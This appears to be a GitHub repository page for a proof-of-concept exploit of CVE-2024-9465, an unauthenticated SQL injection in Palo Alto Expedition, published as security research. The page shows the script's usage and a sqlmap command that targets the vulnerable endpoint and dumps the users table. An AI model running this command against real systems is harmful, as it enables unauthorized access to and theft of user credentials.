Skip to content
/ CVE-2024-9465 Public

Proof of Concept Exploit for CVE-2024-9465

26 stars 4 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

horizon3ai/CVE-2024-9465

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

2 Commits
CVE-2024-9465.py
CVE-2024-9465.py
 
 
README.md
README.md
 
 

Repository files navigation

CVE-2024-9465: Palo Alto Expedition Unauthenticated SQL Injection

Proof of concept to exploit CVE-2024-9465 on vulnerable devices.

Blog Post

Root cause and indicators of compromise here: https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/

Usage

% python3 CVE-2024-9465.py -h
usage: CVE-2024-9465.py [-h] -u URL

options:
  -h, --help         show this help message and exit
  -u URL, --url URL  The URL of the target

SQLMap Dump Table

python3 sqlmap.py -u "https://<ip_address>/bin/configurations/parsers/Checkpoint/CHECKPOINT.php?action=im port&type=test&project=pandbRBAC&signatureid=1" -p signatureid -T users --dump

Follow the Horizon3.ai Attack Team on Twitter for the latest security research:

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

About

Proof of Concept Exploit for CVE-2024-9465

Resources

Readme
Activity
Custom properties

Stars

26 stars

Watchers

4 watching

Forks

4 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages